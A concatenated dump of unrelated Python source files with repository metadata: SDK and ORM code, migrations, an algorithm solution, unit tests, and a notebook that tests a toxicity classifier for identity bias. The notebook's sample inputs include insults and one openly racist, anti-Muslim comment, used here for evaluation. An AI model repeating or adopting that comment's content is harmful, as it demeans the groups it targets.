| 2018-07-20T13:21:17 | 2018-07-20T13:21:16 | null |
UTF-8
|
Python
| false | false | 1,572 |
py
|
# coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class DescribeClientListRequest(JDCloudRequest):
"""
查询当前客户端IP列表
"""
def __init__(self, parameters, header=None, version="v1"):
super(DescribeClientListRequest, self).__init__(
'/regions/{regionId}/cacheInstance/{cacheInstanceId}/clientList', 'GET', header, version)
self.parameters = parameters
class DescribeClientListParameters(object):
def __init__(self, regionId, cacheInstanceId, ):
"""
:param regionId: 缓存Redis实例所在区域的Region ID。目前有华北-北京、华南-广州、华东-上海三个区域,Region ID分别为cn-north-1、cn-south-1、cn-east-2
:param cacheInstanceId: 缓存Redis实例ID,是访问实例的唯一标识
"""
self.regionId = regionId
self.cacheInstanceId = cacheInstanceId
|
[
"[email protected]"
] | |
7c6e2ad300adefc46b95d659f9cefe698aeb499b
|
20f951bd927e4e5cde8ef7781813fcf0d51cc3ea
|
/fossir/modules/events/contributions/models/subcontributions.py
|
9ff806fba366acfa3d3ecfa78f127ae91c426fa9
|
[] |
no_license
|
HodardCodeclub/SoftwareDevelopment
|
60a0fbab045cb1802925d4dd5012d5b030c272e0
|
6300f2fae830c0c2c73fe0afd9c684383bce63e5
|
refs/heads/master
| 2021-01-20T00:30:02.800383 | 2018-04-27T09:28:25 | 2018-04-27T09:28:25 | 101,277,325 | 0 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,998 |
py
|
from __future__ import unicode_literals
from fossir.core.db import db
from fossir.core.db.sqlalchemy.attachments import AttachedItemsMixin
from fossir.core.db.sqlalchemy.descriptions import DescriptionMixin, RenderMode
from fossir.core.db.sqlalchemy.notes import AttachedNotesMixin
from fossir.core.db.sqlalchemy.util.queries import increment_and_get
from fossir.util.locators import locator_property
from fossir.util.string import format_repr, return_ascii
def _get_next_friendly_id(context):
"""Get the next friendly id for a sub-contribution."""
from fossir.modules.events.contributions.models.contributions import Contribution
contribution_id = context.current_parameters['contribution_id']
assert contribution_id is not None
return increment_and_get(Contribution._last_friendly_subcontribution_id, Contribution.id == contribution_id)
def _get_next_position(context):
"""Get the next menu entry position for the event."""
contribution_id = context.current_parameters['contribution_id']
res = db.session.query(db.func.max(SubContribution.position)).filter_by(contribution_id=contribution_id).one()
return (res[0] or 0) + 1
class SubContribution(DescriptionMixin, AttachedItemsMixin, AttachedNotesMixin, db.Model):
__tablename__ = 'subcontributions'
__table_args__ = (db.Index(None, 'friendly_id', 'contribution_id', unique=True),
{'schema': 'events'})
PRELOAD_EVENT_ATTACHED_ITEMS = True
PRELOAD_EVENT_NOTES = True
ATTACHMENT_FOLDER_ID_COLUMN = 'subcontribution_id'
possible_render_modes = {RenderMode.html, RenderMode.markdown}
default_render_mode = RenderMode.markdown
id = db.Column(
db.Integer,
primary_key=True
)
#: The human-friendly ID for the sub-contribution
friendly_id = db.Column(
db.Integer,
nullable=False,
default=_get_next_friendly_id
)
contribution_id = db.Column(
db.Integer,
db.ForeignKey('events.contributions.id'),
index=True,
nullable=False
)
position = db.Column(
db.Integer,
nullable=False,
default=_get_next_position
)
title = db.Column(
db.String,
nullable=False
)
duration = db.Column(
db.Interval,
nullable=False
)
is_deleted = db.Column(
db.Boolean,
nullable=False,
default=False
)
#: External references associated with this contribution
references = db.relationship(
'SubContributionReference',
lazy=True,
cascade='all, delete-orphan',
backref=db.backref(
'subcontribution',
lazy=True
)
)
#: Persons associated with this contribution
person_links = db.relationship(
'SubContributionPersonLink',
lazy=True,
cascade='all, delete-orphan',
backref=db.backref(
'subcontribution',
lazy=True
)
)
# relationship backrefs:
# - attachment_folders (AttachmentFolder.subcontribution)
# - contribution (Contribution.subcontributions)
# - legacy_mapping (LegacySubContributionMapping.subcontribution)
# - note (EventNote.subcontribution)
def __init__(self, **kwargs):
# explicitly initialize this relationship with None to avoid
# an extra query to check whether there is an object associated
# when assigning a new one (e.g. during cloning)
kwargs.setdefault('note', None)
super(SubContribution, self).__init__(**kwargs)
@property
def event(self):
return self.contribution.event
@locator_property
def locator(self):
return dict(self.contribution.locator, subcontrib_id=self.id)
@property
def is_protected(self):
return self.contribution.is_protected
@property
def session(self):
"""Convenience property so all event entities have it"""
return self.contribution.session if self.contribution.session_id is not None else None
@property
def timetable_entry(self):
"""Convenience property so all event entities have it"""
return self.contribution.timetable_entry
@property
def speakers(self):
return self.person_links
@speakers.setter
def speakers(self, value):
self.person_links = value.keys()
@property
def location_parent(self):
return self.contribution
def get_access_list(self):
return self.contribution.get_access_list()
def get_manager_list(self, recursive=False):
return self.contribution.get_manager_list(recursive=recursive)
@return_ascii
def __repr__(self):
return format_repr(self, 'id', is_deleted=False, _text=self.title)
def can_access(self, user, **kwargs):
return self.contribution.can_access(user, **kwargs)
def can_manage(self, user, role=None, **kwargs):
return self.contribution.can_manage(user, role, **kwargs)
|
[
"[email protected]"
] | |
6305acaf43a088e91df5df323d21cd70ced14c36
|
a062669a7f37412f016534ae30bd41e9efe6afa5
|
/product/migrations/0013_auto_20201127_0026.py
|
8b034f4bd8a91d3a1e265777d20c4ce041f762fb
|
[] |
no_license
|
techappg/meat_fun_backend
|
7c05045ae0ca6a442eb6e24693a800ca98447e9b
|
e16da0ec1ccfb583a43f534ad9fd6cb79fe1e6c1
|
refs/heads/main
| 2023-04-16T22:42:38.183722 | 2021-04-22T07:37:07 | 2021-04-22T07:37:07 | 360,430,038 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 396 |
py
|
# Generated by Django 3.1 on 2020-11-27 08:26
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('product', '0012_auto_20201127_0024'),
]
operations = [
migrations.AlterField(
model_name='contact_us',
name='mobile',
field=models.IntegerField(),
),
]
|
[
"[email protected]"
] | |
ed6a4ab01226c402541becc7afe28423eff22758
|
036a41c913b3a4e7ae265e22a672dd89302d3200
|
/0201-0300/0248/0248_Python_1.py
|
760cb2e6b8f7b3dda42f9d212933b86444a78d20
|
[] |
no_license
|
ChangxingJiang/LeetCode
|
e76f96ebda68d7ade53575354479cfc33ad4f627
|
a2209206cdd7229dd33e416f611e71a984a8dd9e
|
refs/heads/master
| 2023-04-13T15:23:35.174390 | 2021-04-24T05:54:14 | 2021-04-24T05:54:14 | 272,088,506 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,018 |
py
|
class Solution:
# 已知开始范围,计算两个数之间的数量
@staticmethod
def num1(low, high, middle=False):
if middle:
return len([str(i) for i in [0, 1, 8] if int(low) <= i <= int(high)])
else:
return len([str(i) for i in [0, 1, 6, 8, 9] if int(low) < i < int(high)])
# 计算各个位的数量
@staticmethod
def count(n, first):
if n == 0:
return 1
if n == 1:
return 3
if n == 2:
return 4 if first else 5
if first:
return 4 * Solution.count(n - 2, first=False)
else:
return 5 * Solution.count(n - 2, first=False)
def strobogrammaticInRange(self, low: str, high: str) -> int:
# 字符串交换列表
reverse_lst = {
"0": "0",
"1": "1",
"6": "9",
"8": "8",
"9": "6"
}
# print("当前计算:", low, high)
# 如果顺序相反则返回0
if int(low) > int(high):
return 0
# 处理两个数完全相同的情况
if low == high:
return 1 if low == low[::-1] else 0
a, b = len(low), len(high)
# 处理两数位数不同的情况
# 例:(150-525) -> (150-199) + (200-499) + (500-525)
if a == b:
# 寻找两个数第一个不同的位数
i = 0
while i < a and low[i] == high[i]:
i += 1
s = a // 2
# 处理只有一位的情况
# 处理奇数长度的中间位的情况
if a == 1 or (a % 2 == 1 and i == s):
return self.num1(low[i], high[i], middle=True)
# 处理在中间位之前的情况
if (a % 2 == 0 and i < s) or (a % 2 == 1 and i < s):
ans = self.num1(low[i], high[i]) * self.count(a - (i + 1) * 2, first=False)
# print(low, high, "(", i, ")", "=",
# self.num1(low[i], high[i]), "*", self.count(a - (i + 1) * 2, first=False), "=", ans,
# "->",
# (low, low[:i + 1] + "9" * (a - i - 1)) if low[i] in reverse_lst else (),
# (high[:i + 1] + "0" * (a - i - 1), high) if high[i] in reverse_lst else ())
if low[i] in reverse_lst:
high2 = low[:i + 1] + "9" * (a - i - 1)
ans += self.strobogrammaticInRange(low, high2)
if high[i] in reverse_lst:
low2 = high[:i + 1] + "0" * (a - i - 1)
ans += self.strobogrammaticInRange(low2, high)
return ans
# 处理中心位之后的情况
ch = reverse_lst[low[s - (i - s + 1)] if a % 2 == 0 else low[s - (i - s)]] # 计算当前字符的目标值
# 计算是否超出情况
if int(low[i]) < int(ch) < int(high[i]):
return 1
elif int(low[i]) == int(ch):
while i < a:
ch = reverse_lst[low[s - (i - s + 1)] if a % 2 == 0 else low[s - (i - s)]] # 计算当前字符的目标值
if int(ch) > int(low[i]):
return 1
elif int(ch) == int(low[i]):
i += 1
else:
return 0
return 1
elif int(ch) == int(high[i]):
while i < a:
ch = reverse_lst[low[s - (i - s + 1)] if a % 2 == 0 else low[s - (i - s)]] # 计算当前字符的目标值
if int(ch) < int(high[i]):
return 1
elif int(ch) == int(high[i]):
i += 1
else:
return 0
return 1
else:
return 0
# 处理两个数位数不同的情况
# 例:(50-4050) -> (50-99) + 3位数的情况数 + (1000-4050)
else:
ans = 0
for i in range(a + 1, b):
ans += self.count(i, first=True)
# print(low, high, "=", ans, "->", (low, "9" * a), ("1" + "0" * (b - 1), high))
return (ans +
self.strobogrammaticInRange(low, "9" * a) +
self.strobogrammaticInRange("1" + "0" * (b - 1), high))
if __name__ == "__main__":
print(Solution().strobogrammaticInRange(low="50", high="100")) # 3
print(Solution().strobogrammaticInRange(low="0", high="9")) # 3
print(Solution().strobogrammaticInRange(low="100", high="50")) # 0
print(Solution().strobogrammaticInRange(low="1", high="0")) # 0
print(Solution().strobogrammaticInRange(low="0", high="100")) # 7
print(Solution().strobogrammaticInRange(low="100", high="1000")) # 12
print(Solution().strobogrammaticInRange(low="0", high="1680")) # 21
print(Solution().strobogrammaticInRange(low="0", high="2147483647")) # 3124
|
[
"[email protected]"
] | |
9277ddc026afe786dbfa6c7fce9b98dc97c38959
|
19cec240505e27546cb9b10104ecb16cc2454702
|
/linux/app/web/python/wikicode/dc/__init__.py
|
92f91ec3adc810b7ed3614687a82c4219108541c
|
[] |
no_license
|
imosts/flume
|
1a9b746c5f080c826c1f316a8008d8ea1b145a89
|
a17b987c5adaa13befb0fd74ac400c8edbe62ef5
|
refs/heads/master
| 2021-01-10T09:43:03.931167 | 2016-03-09T12:09:53 | 2016-03-09T12:09:53 | 53,101,798 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,572 |
py
|
import sys, socket, os, wikicode
import flume.flmos as flmo
from wikicode import to_rpc_proxy
class Declassifier (object):
def config (self):
"""
This is a CGI program used to configure the declassifier
"""
import wikicode
class Config (wikicode.extension):
def run (self):
self.send_page ("Generic DC Setup")
wikicode.run_extension (Config)
def declassify_ok (self, *args):
"""
This is a method that returns True or False depending on whether
the user with uid <owner_uid> is willing to declassify to user <recipient_uid>
"""
raise NotImplementedError, 'subclass must implement this method'
def run (self):
if len (sys.argv) > 1:
tagval = int (sys.argv[1])
instance_tagval = int (sys.argv[2])
owner_name = sys.argv[3]
owner_uid = int (sys.argv[4])
devel_homedir = sys.argv[5]
recipient_uid = int (sys.argv[6])
rpc_fd, rpc_proxy = to_rpc_proxy (os.environ[wikicode.RPC_TAG_ENV])
if self.declassify_ok (tagval, instance_tagval,
owner_name, owner_uid,
devel_homedir,
recipient_uid, rpc_fd, rpc_proxy):
rpc_proxy.set_dc_ok (True)
sys.exit (0)
else:
sys.exit (-1)
else:
self.config ()
if __name__ == '__main__':
obj = Declassifier ()
obj.run ()
|
[
"imosts"
] |
imosts
|
3e200464fcd0c7743e17cb6998f1810928aa115a
|
a2b6bc9bdd2bdbe5871edb613065dd2397175cb3
|
/Cookbook/Array/岛屿数量.py
|
571395c6c2f6f2f328b0dda10d09b4a6f34e41e6
|
[] |
no_license
|
Asunqingwen/LeetCode
|
ed8d2043a31f86e9e256123439388d7d223269be
|
b7c59c826bcd17cb1333571eb9f13f5c2b89b4ee
|
refs/heads/master
| 2022-09-26T01:46:59.790316 | 2022-09-01T08:20:37 | 2022-09-01T08:20:37 | 95,668,066 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,635 |
py
|
'''
给你一个由 '1'(陆地)和 '0'(水)组成的的二维网格,请你计算网格中岛屿的数量。
岛屿总是被水包围,并且每座岛屿只能由水平方向和/或竖直方向上相邻的陆地连接形成。
此外,你可以假设该网格的四条边均被水包围。
示例 1:
输入:grid = [
["1","1","1","1","0"],
["1","1","0","1","0"],
["1","1","0","0","0"],
["0","0","0","0","0"]
]
输出:1
示例 2:
输入:grid = [
["1","1","0","0","0"],
["1","1","0","0","0"],
["0","0","1","0","0"],
["0","0","0","1","1"]
]
输出:3
提示:
m == grid.length
n == grid[i].length
1 <= m, n <= 300
grid[i][j] 的值为 '0' 或 '1'
'''
from typing import List
class UnionFind:
def __init__(self,grid):
row, col = len(grid), len(grid[0])
self.count = 0
self.parent = [-1] * (row * col)
self.rank = [0] * (row * col)
for i in range(row):
for j in range(col):
if grid[i][j] == "1":
self.parent[i * col + j] = i * col + j
self.count += 1
def find(self, i):
if self.parent[i] == i:
return i
self.parent[i] = self.find(self.parent[i]) #路径压缩
return self.parent[i]
def union(self, x, y):
rootx = self.find(x)
rooty = self.find(y)
if rootx != rooty:
if self.rank[rootx] < self.rank[rooty]: #将秩,即树的深度小的父节点设为深度大的节点
rootx, rooty = rooty, rootx
self.parent[rooty] = rootx
if self.rank[rootx] == self.rank[rooty]:
self.rank[rootx] += 1
self.count -= 1 #合并一个节点,就少一个岛
def getCount(self):
return self.count
class Solution:
def numIslands(self, grid: List[List[str]]) -> int:
row = len(grid)
if row == 0:
return 0
col = len(grid[0])
uf = UnionFind(grid)
for r in range(row):
for c in range(col):
if grid[r][c] == "1":
grid[r][c] = "0"
for x, y in ((r - 1, c), (r + 1, c), (r, c - 1), (r, c + 1)):
if 0 <= x < row and 0 <= y < col and grid[x][y] == "1":
uf.union(r * col + c, x * col + y)
return uf.getCount()
if __name__ == '__main__':
grid = [
["1", "1", "1", "1", "0"],
["1", "1", "0", "1", "0"],
["1", "1", "0", "0", "0"],
["0", "0", "0", "0", "0"]
]
sol = Solution()
print(sol.numIslands(grid))
|
[
"[email protected]"
] | |
8b822886de793fad5cc78d1bdeeab56f9dfb7197
|
85f1488f3d0996b83292f74b3672793f2778503f
|
/notebooks/Model Diagnostics.py
|
96d24d2bbf464d6e372c397f7b713a044f8955dd
|
[] |
no_license
|
ceshine/jigsaw-toxic-2019
|
33f66d6643aeeeb20599ab95368ce2c1f6500543
|
34d5df28e1b820725f964fbbdfe039daea31c0d7
|
refs/heads/master
| 2022-02-22T10:50:51.444794 | 2019-08-04T04:13:00 | 2019-08-04T04:13:00 | 198,053,856 | 7 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,796 |
py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import sys
sys.path.append("..")
# In[2]:
from pathlib import Path
from functools import partial
import numpy as np
import pandas as pd
import torch
import joblib
from torch.utils.data import DataLoader
from toxic.inference_bert import get_token_ids
from toxic.dataset import AUX_COLUMNS, ToxicDataset, collate_examples, SortSampler
from toxic.common import ToxicBot
from toxic.metric import ToxicMetric
# In[3]:
MODEL_PATH = Path("../data/cache/")
DEVICE = "cuda:0"
# In[4]:
tokenizer = joblib.load(str(MODEL_PATH / "bert-base-uncased_tokenizer.jbl"))
model = torch.load(str(MODEL_PATH / "bert-base-uncased_-1_yuval_220_f0.pth")).to(DEVICE)
# In[5]:
collate_fn = partial(
collate_examples,
truncate_len=220,
pad=0,
closing_id=tokenizer.vocab["[SEP]"],
mode="both"
)
# 
# [source](https://twitter.com/jessamyn/status/900867154412699649)
# In[6]:
test_text = [
"I am a man",
"I am a woman",
"I am a lesbian",
"I am gay man",
"I am dyke",
"I am a white man",
"I am a gay woman",
"I am a white woman",
"I am a gay white man",
"I am a black man",
"I am a gay white man",
"I am a gay black man",
"I am a black woman",
"I am a gay black woman"
]
df = pd.DataFrame(dict(comment_text=test_text))
# In[7]:
tokens = get_token_ids(
df, tokenizer, is_bert=True)
test_ds = ToxicDataset(df, tokens, labeled=False)
test_loader = DataLoader(
test_ds,
collate_fn=collate_fn,
batch_size=32,
num_workers=0,
pin_memory=True
)
# In[8]:
with torch.no_grad():
results = []
for batch, _ in test_loader:
results.append(model(batch.cuda()))
results = torch.sigmoid(torch.cat(results)) * 100
results.size()
# In[9]:
predictions = pd.DataFrame(results.cpu().numpy(), columns=AUX_COLUMNS)
predictions["text"] = df["comment_text"].values
predictions.shape
# In[10]:
pd.set_option('display.float_format', lambda x: '%.2f' % x)
# In[11]:
predictions.columns
# In[12]:
predictions[["text", "target", "identity_attack", "female", "homosexual_gay_or_lesbian", "black", "white"]].rename(
columns={"target": "toxic", "homosexual_gay_or_lesbian":"homosexual"})
# ## Other random examples
# In[23]:
test_text = [
"Pretty sad really. Thousands come out to protest Trump who's in another country......and all those NDP and Green members - who were the driving force behind Proportional Representation - couldn't find the time to get out to support their own cause. That said, you can bet that Trudeau has alredy lost a good portion of that NDP/Green vote. The guy's a liar. Period.",
"Idiots.",
"Then put them in jail until they decide to cooperate. This is ridiculous....",
"\"He’s a proven liar. Why would you believe anything he has to say?\"\n\nExactly.\nThat\'s why I do not listen to a word Donnie says.",
"Fascinating young woman, impressive work. It reminds me of one of the reasons I love Alaska so much —\xa0the people Alaska attracts are often just as extraordinary as the landscape itself. Great article, thank you.",
"Well, at least the Russians are white, for heaven's sakes. I'd rather have to live next to a nice white drunk Russian than a black Muslim Kenyan whose children's names are Satanic anagrams.",
"Was I posted yesterday, it is interesting to note that under Session's watch only three black people have been appointed in Alabama for the federal courts. This despite the fact that black people make up over 39% of the population of that state. What underlines this reality must be Session's unconscious, if not conscious, attitude towards blacks in general."
]
df = pd.DataFrame(dict(comment_text=test_text))
# In[24]:
tokens = get_token_ids(
df, tokenizer, is_bert=True)
print([len(x) for x in tokens])
test_ds = ToxicDataset(df, tokens, labeled=False)
test_loader = DataLoader(
test_ds,
collate_fn=collate_fn,
batch_size=32,
num_workers=0,
pin_memory=True
)
with torch.no_grad():
results = []
for batch, _ in test_loader:
results.append(model(batch.cuda()))
results = torch.sigmoid(torch.cat(results)) * 100
results.size()
predictions = pd.DataFrame(results.cpu().numpy(), columns=AUX_COLUMNS)
predictions["text"] = df["comment_text"].values
predictions[["text", "target", "identity_attack", "female", "homosexual_gay_or_lesbian", "black", "white"]].rename(
columns={"target": "toxic", "homosexual_gay_or_lesbian":"homosexual"})
# ## Validate
# Make sure the mode is set up correctly.
# In[80]:
df_valid, tokens_valid = joblib.load(str(MODEL_PATH / "valid_bert-base-uncased_-1_yuval_f0.jbl"))
idx = np.random.choice(np.arange(df_valid.shape[0]), 32 * 1000)
df_valid, tokens_valid = df_valid.iloc[idx].reset_index(drop=True), tokens_valid[idx]
valid_ds = ToxicDataset(df_valid, tokens_valid, labeled=True)
val_sampler = SortSampler(valid_ds, key=lambda x: len(valid_ds.tokens[x]))
df_valid = df_valid.iloc[list(iter(val_sampler))]
print(df_valid.target.describe())
# In[81]:
valid_loader = DataLoader(
valid_ds,
collate_fn=collate_fn,
batch_size=64,
num_workers=0,
pin_memory=True,
sampler=val_sampler
)
# In[82]:
bot = ToxicBot(
checkpoint_dir=Path("/tmp/"),
log_dir=Path("/tmp/"),
model=model, train_loader=None,
val_loader=None, optimizer=None,
echo=False,
criterion=None,
avg_window=100,
callbacks=[],
pbar=False,
use_tensorboard=False,
device=DEVICE
)
valid_pred, valid_y = bot.predict(valid_loader, return_y=True)
# In[84]:
pd.set_option('precision', 4)
metric = ToxicMetric(df_valid)
metric(valid_y, valid_pred)
# In[ ]:
|
[
"[email protected]"
] | |
fa091d4a5b67cc3425553a4c3c7993b379d5a42c
|
2a2505108cd429d39746050d0100f4963dcd9c69
|
/src/compas/geometry/bbox/__init__.py
|
b19dd1d59cd854d5d9397b2cf4ef284c580ed6d6
|
[
"MIT"
] |
permissive
|
adacko/compas
|
677095bea007c22a98b44af3281131b445cb1ae1
|
47c443ad3825897ec7ed932ec20734c2f08ef120
|
refs/heads/master
| 2020-07-23T00:55:51.348907 | 2019-09-09T16:44:18 | 2019-09-09T16:44:18 | 207,390,442 | 0 | 1 |
MIT
| 2019-09-09T19:40:41 | 2019-09-09T19:40:41 | null |
UTF-8
|
Python
| false | false | 260 |
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import compas
from .bbox import *
if not compas.IPY:
from .bbox_numpy import *
__all__ = [name for name in dir() if not name.startswith('_')]
|
[
"[email protected]"
] | |
c26747d4798c12a9061590246550915c3f49b876
|
f7c7063e1a22b773a271a953c013a3c5303b70b3
|
/src/litter_trap.py
|
f5802491a1ff00f278838b9b59f2b0dfe66141a0
|
[] |
no_license
|
Ewan82/ah_data
|
e0cce8fffafd91eb6fca8ce6af602d3230535f87
|
d5961f284187acda8d1317bb4fd50f32c85bb591
|
refs/heads/master
| 2021-01-19T01:55:47.530127 | 2016-11-04T11:07:09 | 2016-11-04T11:07:09 | 40,532,005 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 277 |
py
|
import numpy as np
import matplotlib.mlab as mlab
def convert_csv2rec(file_no):
return mlab.csv2rec('../litter_traps/litterscans/file0'+str(file_no)+'.csv')
def remove_false_data(area_arr, tol=2.0):
idx = np.where(area_arr < tol)
return np.delete(area_arr, idx)
|
[
"[email protected]"
] | |
13c31e9d950cf3be9f2b388eecebe51ef72bd351
|
b1c7a768f38e2e987a112da6170f49503b9db05f
|
/stockkeeping/migrations/0010_auto_20181101_1545.py
|
34ef7c9e3a98255c3676811073ad0d7d44aad3d4
|
[] |
no_license
|
Niladrykar/bracketerp
|
8b7491aa319f60ec3dcb5077258d75b0394db374
|
ca4ee60c2254c6c132a38ce52410059cc6b19cae
|
refs/heads/master
| 2022-12-11T04:23:07.504966 | 2019-03-18T06:58:13 | 2019-03-18T06:58:13 | 176,218,029 | 1 | 0 | null | 2022-12-08T03:01:46 | 2019-03-18T06:27:37 |
JavaScript
|
UTF-8
|
Python
| false | false | 417 |
py
|
# Generated by Django 2.0.6 on 2018-11-01 10:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('stockkeeping', '0009_auto_20181101_1544'),
]
operations = [
migrations.AlterField(
model_name='purchase_total',
name='Total',
field=models.PositiveIntegerField(blank=True, null=True),
),
]
|
[
"[email protected]"
] | |
78dc4511525e97dd533b1940967724911ec49d65
|
e71fa62123b2b8f7c1a22acb1babeb6631a4549b
|
/xlsxwriter/test/table/test_table07.py
|
121beef77b97ead58a919c1640b8c21d77b0c360
|
[
"BSD-2-Clause"
] |
permissive
|
timgates42/XlsxWriter
|
40480b6b834f28c4a7b6fc490657e558b0a466e5
|
7ad2541c5f12b70be471b447ab709c451618ab59
|
refs/heads/main
| 2023-03-16T14:31:08.915121 | 2022-07-13T23:43:45 | 2022-07-13T23:43:45 | 242,121,381 | 0 | 0 |
NOASSERTION
| 2020-02-21T11:14:55 | 2020-02-21T11:14:55 | null |
UTF-8
|
Python
| false | false | 2,017 |
py
|
###############################################################################
#
# Tests for XlsxWriter.
#
# SPDX-License-Identifier: BSD-2-Clause
# Copyright (c), 2013-2022, John McNamara, [email protected]
#
import unittest
from io import StringIO
from ..helperfunctions import _xml_to_list
from ...table import Table
from ...worksheet import Worksheet
from ...workbook import WorksheetMeta
from ...sharedstrings import SharedStringTable
class TestAssembleTable(unittest.TestCase):
"""
Test assembling a complete Table file.
"""
def test_assemble_xml_file(self):
"""Test writing a table"""
self.maxDiff = None
worksheet = Worksheet()
worksheet.worksheet_meta = WorksheetMeta()
worksheet.str_table = SharedStringTable()
# Set the table properties.
worksheet.add_table('C3:F14', {'total_row': 1})
worksheet._prepare_tables(1, {})
fh = StringIO()
table = Table()
table._set_filehandle(fh)
table._set_properties(worksheet.tables[0])
table._assemble_xml_file()
exp = _xml_to_list("""
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="1" name="Table1" displayName="Table1" ref="C3:F14" totalsRowCount="1">
<autoFilter ref="C3:F13"/>
<tableColumns count="4">
<tableColumn id="1" name="Column1"/>
<tableColumn id="2" name="Column2"/>
<tableColumn id="3" name="Column3"/>
<tableColumn id="4" name="Column4"/>
</tableColumns>
<tableStyleInfo name="TableStyleMedium9" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
</table>
""")
got = _xml_to_list(fh.getvalue())
self.assertEqual(got, exp)
|
[
"[email protected]"
] | |
eadf86477e07dc6fcb83e07e480e090199897cee
|
e43e8bd052a613f158e29339aaa7e3bdec40b6fb
|
/models/faster_rcnn_inception_resnet_v2_keras_feature_extractor_test.py
|
a3c33c28e62db57565d0119cf742f97bb5d8df3d
|
[] |
no_license
|
sakshijain032/Harmful-Object-Detection
|
249f586ffbc7de99f6647689bae230f3b79694b3
|
8e1711fc1596b451f97b5ff2f7690453a888c848
|
refs/heads/master
| 2022-12-24T18:40:41.795010 | 2020-10-01T17:34:42 | 2020-10-01T17:34:42 | 293,727,797 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,612 |
py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for models.faster_rcnn_inception_resnet_v2_keras_feature_extractor."""
import tensorflow as tf
from models import faster_rcnn_inception_resnet_v2_keras_feature_extractor as frcnn_inc_res
class FasterRcnnInceptionResnetV2KerasFeatureExtractorTest(tf.test.TestCase):
def _build_feature_extractor(self, first_stage_features_stride):
return frcnn_inc_res.FasterRCNNInceptionResnetV2KerasFeatureExtractor(
is_training=False,
first_stage_features_stride=first_stage_features_stride,
batch_norm_trainable=False,
weight_decay=0.0)
def test_extract_proposal_features_returns_expected_size(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=16)
preprocessed_inputs = tf.random_uniform(
[1, 299, 299, 3], maxval=255, dtype=tf.float32)
rpn_feature_map = feature_extractor.get_proposal_feature_extractor_model(
name='TestScope')(preprocessed_inputs)
features_shape = tf.shape(rpn_feature_map)
init_op = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
features_shape_out = sess.run(features_shape)
self.assertAllEqual(features_shape_out, [1, 19, 19, 1088])
def test_extract_proposal_features_stride_eight(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=8)
preprocessed_inputs = tf.random_uniform(
[1, 224, 224, 3], maxval=255, dtype=tf.float32)
rpn_feature_map = feature_extractor.get_proposal_feature_extractor_model(
name='TestScope')(preprocessed_inputs)
features_shape = tf.shape(rpn_feature_map)
init_op = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
features_shape_out = sess.run(features_shape)
self.assertAllEqual(features_shape_out, [1, 28, 28, 1088])
def test_extract_proposal_features_half_size_input(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=16)
preprocessed_inputs = tf.random_uniform(
[1, 112, 112, 3], maxval=255, dtype=tf.float32)
rpn_feature_map = feature_extractor.get_proposal_feature_extractor_model(
name='TestScope')(preprocessed_inputs)
features_shape = tf.shape(rpn_feature_map)
init_op = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
features_shape_out = sess.run(features_shape)
self.assertAllEqual(features_shape_out, [1, 7, 7, 1088])
def test_extract_proposal_features_dies_on_invalid_stride(self):
with self.assertRaises(ValueError):
self._build_feature_extractor(first_stage_features_stride=99)
def test_extract_proposal_features_dies_with_incorrect_rank_inputs(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=16)
preprocessed_inputs = tf.random_uniform(
[224, 224, 3], maxval=255, dtype=tf.float32)
with self.assertRaises(ValueError):
feature_extractor.get_proposal_feature_extractor_model(
name='TestScope')(preprocessed_inputs)
def test_extract_box_classifier_features_returns_expected_size(self):
feature_extractor = self._build_feature_extractor(
first_stage_features_stride=16)
proposal_feature_maps = tf.random_uniform(
[2, 17, 17, 1088], maxval=255, dtype=tf.float32)
model = feature_extractor.get_box_classifier_feature_extractor_model(
name='TestScope')
proposal_classifier_features = (
model(proposal_feature_maps))
features_shape = tf.shape(proposal_classifier_features)
init_op = tf.global_variables_initializer()
with self.test_session() as sess:
sess.run(init_op)
features_shape_out = sess.run(features_shape)
self.assertAllEqual(features_shape_out, [2, 8, 8, 1536])
if __name__ == '__main__':
tf.test.main()
|
[
"[email protected]"
] | |
d0a334ca6c19f583a7c9f4aa5a63c23ce53c9460
|
077a17b286bdd6c427c325f196eb6e16b30c257e
|
/00_BofVar-unit-tests/07_64/remenissions-work/exploit-BofVar-1.py
|
3e5efa3d0d010a0028daecc2f04b08bca5fc6cab
|
[] |
no_license
|
KurSh/remenissions_test
|
